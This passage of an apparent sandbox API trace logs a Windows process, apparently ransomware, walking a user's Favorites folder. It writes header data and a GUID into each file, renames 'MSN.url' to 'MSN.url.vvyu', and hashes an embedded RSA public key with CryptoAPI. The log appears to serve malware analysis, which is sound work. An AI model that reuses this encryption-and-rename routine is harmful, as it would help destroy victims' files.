(HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0198.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3038 [0198.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30b0 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3050 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0198.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3020 [0198.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0198.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0198.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0198.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94e70 | out: hHeap=0x620000) returned 1 [0198.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.533] WriteFile (in: hFile=0x568, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.533] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.533] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.534] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.535] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.535] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.535] CloseHandle (hObject=0x568) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0198.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0198.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0198.536] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url.vvyu")) returned 1 [0198.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.538] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.541] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0198.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.542] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0198.542] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0198.542] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.542] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.545] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.545] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.547] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.547] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.547] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.547] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.547] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.547] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.548] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.548] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.548] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.548] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.548] GetLastError () returned 0x0 [0198.548] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0198.548] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.549] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.549] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.549] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.549] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94e70 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94e28 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.550] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3050 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3038 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0198.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0198.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.553] HeapFree 